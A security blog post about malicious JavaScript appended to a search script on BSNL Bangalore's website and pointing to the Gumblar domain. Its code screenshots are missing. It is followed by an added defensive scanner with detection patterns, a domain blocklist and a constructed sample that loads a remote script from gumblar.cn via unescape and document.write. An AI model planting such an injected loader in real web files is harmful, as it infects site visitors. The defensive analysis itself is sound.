By: ThreatLabz

BSNL, Bangalore Website Yet Another Victim Of Malicious Code Injection

Compromise

BSNL, Bangalore telecom district has become yet another victim of poor website security and has been infected with malicious JavaScript code. This time, the code points to a malicious domain used by the popular Gumblar botnet. Recently, my colleague Pradeep blogged about two Indian websites, ICWAI and KVGBANK, that were also infected with malicious content. The "http://www.bangaloretelecom.com" site provides information on the telecommunications services offered, telephone number search, online bill payment, etc. This is yet another example of a popular website in India that has been compromised. Here is a screenshot of the home page:

Interestingly, the home page itself does not contain malicious content; rather, the malicious JavaScript has been injected into one of the “.js” files used for searching the content of the website. If you look at the above screenshot, you will see a small search box. The attack is triggered whenever a visitor searches for anything using this functionality. Below is a screenshot of the search page the user is redirected to:


The source code of this page references several “.js” files. The “search.js” file is the one infected with malicious JavaScript code. Here is the source code of that file:


The malicious JavaScript code has been appended at the bottom of this “.js” file, after the legitimate search code. Here is the malicious content:


There are six different malicious JavaScript snippets, each obfuscated in a different way, but all ultimately point to the same malicious domain. Let’s investigate one of them:


The decoded script is shown below:


The above malicious code points to the malicious domain “gumblar.cn”, which was used by the Gumblar Trojan. Fortunately, that domain has since been taken down.


Zscaler blocks the infected resource (http://bangaloretelecom.com/search.js) rather than blocking the whole website. This example illustrates how malicious content can be filtered out while still allowing access to what is otherwise a legitimate site – an important approach, given the prevalence of such infections. Our recent posts highlight the fact that numerous popular Indian websites are struggling with proper application security controls.
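The injection pattern and the per-resource blocking described above, as an added example that is not code from the post or from Zscaler: a small Node.js scanner that peels common string encodings from a script body, flags obfuscation tell-tales (especially at the file's tail, where the post found the payload), and reports any host matching a blocklist. `BLOCKLIST`, `scanScript`, `decodeLayers` and the sample search.js are all constructed here; the only real value is the gumblar.cn domain named in the post.

```javascript
// Added example, not from the original post: a defender-side scanner for the
// injection pattern described above (obfuscated JavaScript appended to the
// bottom of an otherwise legitimate .js file, decoding to a known-bad host).
const BLOCKLIST = ["gumblar.cn"]; // domain named in the post; extend from your own intel

// Obfuscation tell-tales commonly seen in injected snippets.
const INDICATORS = [
  [/\beval\s*\(/, "eval()"],
  [/\bunescape\s*\(/, "unescape()"],
  [/String\.fromCharCode/, "String.fromCharCode"],
  [/document\.write\s*\(/, "document.write()"],
  [/(?:%[0-9a-f]{2}){8,}/i, "long %xx-escaped string"],
  [/(?:\\x[0-9a-f]{2}){8,}/i, "long \\xNN-escaped string"],
];

// Peel the simple encodings so hidden hostnames become visible.
function decodeLayers(text) {
  let out = text.replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  out = out.replace(/String\.fromCharCode\(([\d,\s]+)\)/g,
    (_, nums) => nums.split(",").map((n) => String.fromCharCode(+n.trim())).join(""));
  try { out = decodeURIComponent(out); } catch (e) { /* keep partial decode on a bad %-sequence */ }
  return out;
}

// Scan one script body. The tail check mirrors the post's observation that the
// payload sat at the very end of search.js, after the legitimate code.
function scanScript(source) {
  const decoded = decodeLayers(source);
  const indicators = INDICATORS.filter(([re]) => re.test(source)).map(([, name]) => name);
  const hosts = (decoded.match(/https?:\/\/[a-z0-9.-]+/gi) || [])
    .map((u) => u.replace(/^https?:\/\//i, "").toLowerCase());
  const blocked = [...new Set(hosts.filter((h) => BLOCKLIST.some((b) => h === b || h.endsWith("." + b))))];
  const tail = source.trimEnd().split("\n").slice(-3).join("\n");
  const tailSuspicious = INDICATORS.some(([re]) => re.test(tail));
  return { suspicious: blocked.length > 0 || indicators.length >= 2, indicators, blocked, tailSuspicious };
}

// Constructed sample: a small legitimate search helper with an injected tail.
const SAMPLE_SEARCH_JS = [
  "function doSearch(q) { location.href = '/search.php?q=' + encodeURIComponent(q); }",
  "var s = unescape('%3Cscript%20src%3D%22http%3A%2F%2Fgumblar.cn%2Fexample%22%3E%3C%2Fscript%3E');",
  "document.write(s);",
].join("\n");

console.log(JSON.stringify(scanScript(SAMPLE_SEARCH_JS), null, 2));
```

A proxy or CI check built on this can deny just the flagged script URL, as the post describes, instead of the whole site.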


Umesh

Learn more about Zscaler.